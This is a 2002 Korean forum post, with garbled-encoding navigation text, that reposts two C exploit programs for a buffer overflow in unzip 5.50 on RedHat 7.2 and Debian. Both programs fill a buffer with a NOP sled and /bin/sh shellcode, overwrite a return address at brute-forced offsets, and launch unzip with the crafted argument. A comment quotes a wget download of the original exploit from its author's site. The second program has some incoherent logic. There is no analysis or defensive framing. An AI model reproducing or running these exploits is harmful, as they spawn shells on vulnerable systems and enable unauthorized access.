BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡

±Û¾´ÀÌ: ASSA RedHat Linux 7.2 unzip exploit code Á¶È¸¼ö: 5322

tjdrldud@hanmail.net
http://assa.backrush.com

/*
* last changes: 29.o3.2oo2
*
* PRIVATE CODE! DO NOT DISTRIBUTE!
*
* lame unzip 5.50 exploit
*
* tested on debian potato rev. 3
*
* greetz: hackbox, coder :->
*
* - Hackbox (hackbox.ath.cx)
*
*/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>

#define BUF 4096+904+27961
#define LOC 4096
#define OFFSET 700 // brute force it

char execshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89"
"\xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40"
"\xcd\x80"; /* newroot's shellcode */

int
main (int argc, char *argv[])
{
char buf[BUF + 1];
char *ptr;
int i=0,offset=OFFSET;
unsigned long addy = 0xbffffab0;
if (argc > 1) offset = atoi(argv[1]);

memset(buf,0x90,BUF);
ptr = buf + ((BUF) - strlen(execshell));

for (i=0;i<strlen(execshell);i++)
*(ptr++) = execshell[i];

*(long*)&buf[LOC] = addy + offset;
*(long*)&buf[LOC+4] = addy + offset;

buf[BUF] = 0;

execl("/usr/local/bin/unzip","unzip",buf,NULL);
return;
}











/*
By DVDMAN (DVDMAN@L33TSECURITY.COM)dvdman@snosoft.com
http://www.snosoft.com
http://WWW.L33TSECURITY.COM
L33T SECURITY
Keep It Private

based on code by hackbox.ath.cx
> wget http://hackbox.ath.cx/mizc/unzip-expl.c

lame unzip <= 5.50
tested on redhat 7.2
By DVDMAN
L33TSECURITY.COM
*/


#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#define MAX "\x39\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"
#define BUF 3264+1900+20000
#define LOC 3262
#define OFFSET 700 // brute force it
char fakechunk[] = "\xf0\xff\xff\xff"
"\xfc\xff\xff\xff"
"\xde\x16\xe8\x77"
"\x42\x6c\xe8\x77";
char execshell[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89"
"\xc2\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\x40"
"\xcd\x80"; /* newroot's shellcode */

int
main (int argc, char *argv[])
{

char buf[BUF + 1];
int x;
char *ptr;
int i=0,offset=OFFSET;
unsigned long addy = 0xbffffab0;
if (argc < 2) {
printf("[L33TSECURITY]");
printf("UNZIP EXPLOIT BY DVDMAN ");
printf("[L33TSECURITY]\n");
printf("[Usage] %s Offset\n",argv[0]);
return;
}
if (argc > 1) offset = atoi(argv[1]);

memset(buf,0x90,BUF);
ptr = buf + ((BUF) - strlen(execshell));

for (i=0;i<strlen(execshell);i++)
*(ptr++) = execshell[i];

*(long*)&buf[LOC] = addy + offset;
*(long*)&buf[LOC+4] = addy + offset;

buf[BUF] = 0;
if (buf < MAX) {
x = atoi(fakechunk + 2);
memset(buf,x,BUF);
execl("/usr/bin/unzip","unzip",buf,NULL);
}
execl("/usr/bin/unzip","unzip",buf,fakechunk,NULL);
return;
}


°ü·Ã±Û : ¾øÀ½ ±Û¾´½Ã°£ : 2002/05/08 20:35 from 211.194.245.122

  NewAtlanta ServletExec ISAPI 4.1 remote denial of service exploit ¸ñ·Ïº¸±â »õ±Û ¾²±â Áö¿ì±â ÀÀ´ä±Û ¾²±â ±Û ¼öÁ¤ Posadis Format String and Buffer Overflow Exploit Codes  
BACKRUSH  À¯´Ð½º¸í·É  ´ÙÀ½  ÀÚ·á½Ç  Ascii Table   ¿ø°ÝÁ¢¼Ó  ´Þ·Â,½Ã°£   ÇÁ·Î¼¼½º   ½©
ÁöÇÏö³ë¼±   RFC¹®¼­   SUN FAQ   SUN FAQ1   C¸Þ´º¾ó   PHP¸Þ´º¾ó   ³Ê±¸¸®   ¾Æ½ºÅ°¿ùµå ¾ÆÀÌÇǼ­Ä¡